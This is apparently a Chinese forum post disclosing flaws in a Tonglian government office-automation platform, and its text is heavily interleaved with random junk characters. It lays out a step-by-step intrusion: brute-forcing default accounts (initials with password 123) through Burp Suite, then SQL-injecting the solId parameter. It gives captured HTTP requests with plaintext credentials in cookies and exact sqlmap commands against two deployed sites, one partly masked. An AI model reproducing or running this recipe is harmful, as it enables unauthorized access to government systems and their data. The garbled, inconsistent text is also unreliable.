|
& e1 V$ }8 r( K! N2 k A+ k" t
5 H- U ]. F- X) z6 c5 Y% S ^
8 H9 l- o5 y- [3 J" U: d% H$ {8 x f- s
平台简介: `9 ?$ O! t* B- _1 }% K& H9 t
8 J7 Z- b4 w/ v! W- H
* ?! P0 F+ P4 e8 z
8 L& W5 q+ A% M# p6 }1 a 5 w7 o, m, ]1 r/ M C* K
' A4 _6 q7 w- d4 s1 i 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 & L$ K) p/ P! R Y
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% i$ G* @5 [" U/ g% w% q' N8 f同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!7 [# T q$ f. `) z8 ]2 f
- \2 a( d( [! R& E
, {7 e( Q A$ W2 m
- R+ i1 {/ W" \2 m# v , @5 z# V5 k1 Y! }$ O& f( ^
. V- z7 G0 w, t
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
+ {" s! P( k9 R6 c 2 o$ o6 x" v! V5 n- H Q8 H
) n$ A8 b9 S9 C% e- k5 \" d% H
5 R+ ^3 J6 @- M! G2 R
+ X9 L0 w% \0 ~( [7 o& J, x+ e; P. ^5 {! H
http://1.1.1.1:7197/cap-aco/#(案例2-), f) `+ P' @- @
: o O6 K( T- k4 ]. t; C# v Y
3 ?* c, l" }1 w% {" F, V http://www.XXOO.com (案例1-官网网站)
# J: m: t1 r6 O2 B1 p/ |
/ q8 S, W8 H3 z( C9 d; ]- S& U8 W; f0 \3 @$ I S8 a4 I7 k' X+ ]: h; k4 Y
- H4 {) L [( Y- p7 j 1 h6 p+ S! e; H
. r7 H/ @4 Y7 T4 `- P 漏洞详情:
( e) }+ Y- I$ ]& D) s" [% ], I0 r0 G# B $ u. I8 ^3 J/ l! f H
; I6 z8 z( s8 Z 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试& X2 ?# Y' @, e( F2 h3 _/ R5 Q1 k
" n! j' s, N4 l6 r$ b. D2 W/ h5 X' M/ q+ }' R
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: H/ w" a4 L1 B) \" V- A
' x K; F9 @) o, J6 O: Q$ X$ t5 K( n; o( O
. J) z9 ^# t" Z' u4 I1 t( _8 m2 t
' p# f6 w& i e4 C9 ~* r; h
* R8 s( S( Q; S% o& I
& R: S+ Z% |* _& t
+ e1 [( G7 B4 q
& G3 D) V0 _2 Z status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:7 E& i4 }) ?7 D
$ ^) _+ f3 H9 ]
& C% o" t, l' U: v4 q) C 1、案例1-官方网站
: v% W% p) O- A, G4 |) h( f
# W9 b( f+ u- p2 r1 U8 w' \/ ~8 w" ~4 m7 H! z
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1& Q) H* M4 D( s5 q' ~- p7 J$ c
/ a7 m+ ]4 y% ^* }5 `
( o ^3 k. y- k' Y+ t }" H. t Host: www.XXOO.com
$ ?. ^* d) k0 D2 R
# B( L4 t% M- [7 ~$ Z( r6 q; S$ S! |* O. o4 X P/ [: h
Proxy-Connection: Keep-Alive5 j6 V# |9 N' y# R( f; C
( o9 A2 q' O6 S1 I8 [) a% v& o& A
8 W4 F6 s0 R8 @+ A
Accept: application/json, text/javascript, */*; q=0.01# Q8 C/ `3 r& d3 e2 K- F
D, V/ q% }+ \3 G7 u
' X% P' P$ ?) ]# z. o' i: m Accept-Language: zh-CN! c5 f( e: n0 c3 J
6 q& K$ F7 l. b, C7 y1 D5 [+ S7 D8 c$ ?1 z6 f% S) r" }* z9 t$ z
Content-Type: application/json
* o. p7 G: }- |% t; n
; o2 K# ]4 l# t: t5 F/ I! B+ g/ N) M- E2 k' z+ q
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko6 W8 c' V( H+ m, q
6 t, c+ X5 f7 P# t
+ y6 z! ]+ T& E& j, \$ t
X-Requested-With: XMLHttpRequest
* T' c1 Z# _; k& E0 v% A * ]) y. K* c! r& h1 |1 n. U) Q5 ~
+ q. N6 w) ~* b9 Y( z/ o Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0027 a1 B& S) l) j2 S3 x
8 M+ Q) D% q% y9 f$ k+ f3 [
- o% v' F& u, q& v
Accept-Encoding: gzip, deflate, sdch8 x+ ?: d( W' u' ?! e
; E+ s; M9 |1 B. I1 z
K7 P2 u' _( r( ` Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
& E( n, j4 Q6 x* `9 U+ p& ~( J O/ I
, F) ^2 a1 q- L4 B. \8 X5 A8 H+ T% R$ T: N% D
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:2 r# v/ O, ^- w9 X
6 \7 j1 J) N( G+ L, O2 N
9 l" r3 J6 l' t
z0 P' g. g% z: a* Y 4 z) g% C, L; x! R+ \" v
& Q/ c/ V# O" v# T6 b ( {7 u/ D4 j) W* a8 C: X7 |
- V/ G( u# u" m ?9 ~
x9 K9 {/ F) D) O
* V2 f2 U/ l5 {2 Q G0 S2 h
2 |# Z. l% |. k3 M* K( O+ {) |$ {
6 K6 [ u. Y7 i. U' P% [: o% ]
9 |1 L% E- {+ j3 D5 q " U" J& U1 Q+ X, G
" k7 n1 i* l5 P! C4 _; b) \, D1 p* z
" O1 {3 w+ {% L8 u
% }, P- V$ f/ d, G+ S
6 m, ^/ P) ]8 b2 A k 2、案例2-某天河云平台- k4 {+ g) D2 ~; i" d+ h/ m: J& H
2 L. Z" X4 a' c! u @% x
2 m' }# [; S9 {2 a GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
9 R7 v1 R8 b6 y; N0 F V2 [3 `! a- o% k$ f! E
2 U; e) v9 \; c) {4 ]) t i+ F ^ Host: 1.1.1.:7197. H2 v3 b; h2 b
; w4 u- L9 E( ]$ G9 V/ i+ a5 y4 S, A
- e( @. x- g1 `+ P( ^" d Accept: application/json, text/javascript, */*; q=0.01
5 o T) N* N9 X$ u
3 d. u7 q/ O! k4 L- i( t; B* Q1 @9 s7 g( T* o1 t
X-Requested-With: XMLHttpRequest
9 ~% q* L8 ^7 i% l 7 ?8 r! H( k6 J/ v
7 ^: s" b. y; T! f2 Z0 g5 t0 n- O' o
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
: i: C# b! h+ ]& }; G: R2 t & ]' P- H( p+ |( x! p" t" y
( z4 ]* I6 U/ z6 \! {$ g Content-Type: application/json
1 Y) }$ {6 c! m
" J( F/ D; i9 N7 D1 E* i" G
9 W4 R+ b9 h4 B1 c3 h Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
/ s. _2 P* W: S! ? " ]( Z- n* E, B# c
( M2 F; W, b1 Y. z7 s M! w
Accept-Language: zh-CN,zh;q=0.8# G. J# C% L2 O- ?
]1 u, t: q8 j. O# Q' U: ]3 N. @3 S6 A7 ]) ^% J# W; x
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=10 G- M" ~0 K8 b, y" a- j: T
8 Y% Q' g' x8 a4 c
% i6 C$ L" Z; D Connection: close
' N) `/ k& J4 d/ ? ^- y7 E$ D6 R4 ~
+ d5 S& ^3 `* x
; O! M- T, i' r/ E+ ^8 a 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
1 n+ z0 Q# i5 [) h) o6 e
" i+ B" ^* L& N; M. Y' _: P) D/ t6 s' D7 t- O ]" Z* M/ R$ d; g0 e" q7 {( P
' x/ t0 ~7 V5 B* v8 R
, F) N7 H: W3 C7 _6 Z3 x# M; }7 f2 P: v' L3 h' l" F
, ^ m" X4 a# g, B$ C
|